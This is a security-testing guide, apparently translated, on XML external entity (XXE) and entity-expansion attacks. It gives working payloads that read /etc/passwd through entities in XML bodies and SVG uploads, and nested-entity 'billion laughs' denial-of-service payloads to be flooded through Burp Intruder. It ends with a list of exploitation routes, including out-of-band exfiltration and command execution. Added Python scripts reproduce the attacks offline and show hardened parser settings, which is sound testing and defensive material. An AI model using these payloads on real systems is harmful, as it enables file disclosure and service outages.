
I. Attack scenarios
- Send XML requests directly
- Description
Many application systems or components send XML request bodies (via GET or POST) to the backend for processing. Identify the XML requests the frontend sends, intercept them with a proxy tool, and modify the XML body with XXE payloads to test whether the backend parser resolves external entities.
- Test method
First, look for a request that sends XML directly. For example, suppose you capture a POST to https://127.0.0.1:8443/test/test.action whose body carries a parameter such as:
req=<?xml version="1.0" encoding="UTF-8"?>
<employees>
<employee>
<name>bcbccb.cn</name>
<sex>m</sex>
<age>30</age>
</employee>
</employees>
The parameter body shows that the request content is XML. If the system echoes parsed values back (here, the employee name), send the following request instead, placing the entity reference in the field that is echoed:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE employees [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<employees>
<employee>
<name>&xxe;</name>
<sex>m</sex>
<age>30</age>
</employee>
</employees>
If the parser resolves the entity, the contents of /etc/passwd on the Linux server are rendered on the page, disclosing operating-system user names and similar sensitive information.
More generally, once you know a file's absolute path and the web server process is allowed to read it, you can read its contents this way. Files containing characters such as < or an unescaped & break the parse, which is why plain text files like /etc/passwd are the usual first probe.
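The following script reproduces the scenario above offline. It is an added example, not code from the original article: it writes a constructed secret file in a temporary directory (standing in for /etc/passwd), builds the same employee request with the entity reference inside <name>, and parses it with Python's standard-library xml.sax once with external general entity resolution switched on (the vulnerable configuration) and once with it off (the default since Python 3.7.1). The function and class names are assumptions of this example.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


def build_xxe_request(file_url):
    """Return the employee request from the article with <name> replaced by an
    external entity pointing at file_url (e.g. file:///etc/passwd)."""
    doc = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE employees [
  <!ENTITY xxe SYSTEM "{file_url}">
]>
<employees>
  <employee>
    <name>&xxe;</name>
    <sex>m</sex>
    <age>30</age>
  </employee>
</employees>"""
    return doc.encode("utf-8")


class NameCollector(ContentHandler):
    """Stands in for a backend that echoes every <name> value back to the client."""

    def __init__(self):
        super().__init__()
        self.names = []
        self._in_name = False
        self._buf = []

    def startElement(self, name, attrs):
        if name == "name":
            self._in_name, self._buf = True, []

    def characters(self, content):
        if self._in_name:
            self._buf.append(content)

    def endElement(self, name):
        if name == "name":
            self.names.append("".join(self._buf))
            self._in_name = False


def parse_request(xml_bytes, resolve_external_entities):
    """Parse the request body and return the <name> values the backend would echo.

    resolve_external_entities=True is the vulnerable configuration: xml.sax then
    fetches SYSTEM entities (file://, http://, ...) and splices their content in.
    False is the hardened configuration: the entity is skipped and <name> is empty.
    """
    handler = NameCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.names


def demo():
    """Run the attack against a constructed secret file instead of /etc/passwd."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = Path(tmp) / "secret.txt"
        secret_path.write_text("db_password=hunter2")  # constructed sample secret
        payload = build_xxe_request(secret_path.as_uri())
        leaked = parse_request(payload, resolve_external_entities=True)
        blocked = parse_request(payload, resolve_external_entities=False)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser echoed:", leaked)
    print("hardened parser echoed:  ", blocked)
```

The hardened branch is the same parser with one feature flipped; the equivalent switches elsewhere are `resolve_entities=False` together with `no_network=True` on lxml's `XMLParser`, and the `disallow-doctype-decl` feature on Java's `DocumentBuilderFactory`, which refuses the DTD outright rather than merely skipping entities.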
- Upload XML file
- Description
Many devices accept configuration files in XML format, for example as part of a firmware upgrade. If the backend parses the uploaded XML with entity expansion enabled and without any size limits, a file that defines nested entities expands into an enormous string in memory, exhausting the parser and leaving the device unresponsive.
- Test method
Walk through the system's functions to find modules that accept an XML upload. Upload any XML file, intercept the request with a proxy tool such as Burp Suite, and replace the XML body with a nested entity definition like the following:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE something [
<!ENTITY x0 "Developers!">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
...
<!ENTITY x100 "&x99;&x99;">
]>
<something>&x100;</something>
Each level references the previous one twice, so &x100; stands for 2^100 copies of the seed string; a parser without expansion limits exhausts memory long before it gets there. Send the request to Burp Intruder and run it with a large number of threads (for example 127) to issue many such requests in parallel.
Finally, check whether the device has become slow to respond or has stopped responding, that is, whether the denial of service succeeded.
- Webservice interface
- Description
Since webservice interfaces mainly carry XML, any XML request sent from the frontend may be vulnerable to XML injection when the backend processes it.
- Test method
Besides scanning with tools such as AppScan and AWVS, you can use a tool such as SoapUI to debug the webservice and send test data by hand. The method is the same as in the scenarios above: insert attack data into the XML sent to the server, for example to insert new records, bypass login, or send oversized data to cause a denial of service.
- Upload SVG file
Some websites allow uploading SVG files. SVG is XML, so the same parser is involved: intercept the upload request and insert a DOCTYPE such as the following into the file, referencing the entity from an element whose text the site later renders or returns, to form an XXE injection:
<!DOCTYPE svg [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg"><text x="10" y="20">&test;</text></svg>
- Send requests that contain RSS files directly
RSS (Really Simple Syndication) is an XML-based format for describing and syndicating website content and is one of the most widely used XML applications on the Internet.
A website that lets users supply a custom RSS feed can be attacked through XXE by placing external entity references in the feed.
- XEE (XML Entity Expansion)
This attack aims at denial of service by exhausting the resources of the server that parses the XML. It works by defining custom entities in the DOCTYPE; the definitions produce an in-memory structure far larger than the document itself, consuming the memory the server needs to operate normally.
First confirm that entities are expanded at all by adding a harmless definition and referencing it:
<!DOCTYPE root [<!ENTITY test "TestString">]>
<root>&test;</root>
After the upload, the system returned an error whose echo contained TestString, which shows that entities are being expanded. Then upload a DoS payload of nested entities, such as:
<!DOCTYPE root [
<!ENTITY x0 "TestString">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
...
<!ENTITY x100 "&x99;&x99;">
]>
<root>&x100;</root>
Observe that backend CPU utilization climbs above 100% (more than one core saturated) and the system eventually restarts.
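The script below is an added example, not code from the original article, covering both the XML upload scenario and the XEE test above. It builds the nested-entity payload for an arbitrary depth, parses a small instance with Python's standard-library expat binding to measure how much character data the parser actually materialises, and shows the cheap pre-parse guard (reject any DOCTYPE) that stops entity bombs and XXE alike. The function names and the seed string are assumptions of this example; depth 10 is used for the measurement because depth 100, as in the payload above, stands for 2^100 copies and must never be parsed without limits.

```python
import xml.parsers.expat


def build_entity_bomb(depth, seed="lol", root="something"):
    """Build the nested-entity payload from the article for `depth` levels.

    Every level references the previous one twice, so &x{depth}; stands for
    2**depth copies of `seed` while the document itself stays tiny.
    """
    lines = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        f"<!DOCTYPE {root} [",
        f'  <!ENTITY x0 "{seed}">',
    ]
    for i in range(1, depth + 1):
        lines.append(f'  <!ENTITY x{i} "&x{i - 1};&x{i - 1};">')
    lines.append("]>")
    lines.append(f"<{root}>&x{depth};</{root}>")
    return "\n".join(lines)


def expanded_length(depth, seed="lol"):
    """Number of characters the parser must materialise for &x{depth};."""
    return len(seed) * 2 ** depth


def measure_expansion(xml_text):
    """Parse with expat exactly as a naive backend would and count the
    character data it delivers; internal entities are expanded by default."""
    total = 0

    def on_chars(data):
        nonlocal total
        total += len(data)

    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_text, True)
    return total


def contains_doctype(xml_bytes):
    """Pre-parse guard. XML keywords are case-sensitive, so a well-formed
    document can only introduce a DTD (and therefore entities) with this
    exact token."""
    return b"<!DOCTYPE" in xml_bytes


def guarded_measure(xml_text):
    """Hardened variant: refuse any document carrying a DTD before the parser
    ever sees it, which stops entity bombs and XXE alike."""
    if contains_doctype(xml_text.encode("utf-8")):
        raise ValueError("DOCTYPE not allowed in uploaded XML")
    return measure_expansion(xml_text)


if __name__ == "__main__":
    bomb = build_entity_bomb(10)
    print(f"{len(bomb)} bytes of XML expand to {measure_expansion(bomb)} characters")
    print(f"depth 100 would need {expanded_length(100):e} characters")
```

Two caveats when running the real test. libexpat 2.4.1 and later enforce a billion-laughs limit (default maximum amplification 100x once expanded output passes 8 MiB), so a backend built on a recent expat fails the parse with an amplification error instead of hanging; older expat builds and many other parsers have no such cap. And a string scan for `<!DOCTYPE` is only a first line of defence; the parser's own option to disallow the DTD is the setting to rely on.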
II. Impact
XXE may lead to unauthorized data insertion and login bypass. It can also lead to denial of service against the application, disclosure of server files and configuration, and so on.
XXE exploitation methods for reference:
- Use the file protocol to read /dev/random or /dev/zero, which never reach end of file, to cause a denial of service
- Upload an XML entity-expansion bomb to cause a denial of service
- Use the file protocol on a directory such as file:/// to enumerate its contents (Java parsers return a directory listing)
- Use the http protocol against ip:port combinations to scan hosts and ports on the intranet
- Use the jar protocol to trigger a file write (Java downloads the referenced archive into a temporary file)
- Use the expect protocol to execute arbitrary commands (PHP with the expect extension installed)
- Use the http protocol to exfiltrate data out of band
- Use the php protocol (php://filter) to read and exfiltrate data
- Use the ftp protocol to exfiltrate data
- Use the gopher protocol to exfiltrate data